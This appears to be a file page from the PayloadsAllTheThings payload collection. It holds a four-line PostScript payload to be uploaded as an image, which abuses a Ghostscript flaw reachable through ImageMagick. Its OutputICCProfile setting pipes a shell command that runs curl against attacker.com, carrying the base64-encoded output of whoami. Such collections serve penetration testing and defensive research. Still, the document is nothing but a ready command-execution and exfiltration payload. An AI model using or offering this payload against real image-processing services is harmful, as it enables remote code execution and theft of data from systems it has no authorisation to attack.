PayloadsAllTheThings/Upload Insecure Files/Picture ImageMagick/imagemagick_ghostscript_cmd...

4 lines
130 B
Plaintext

%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit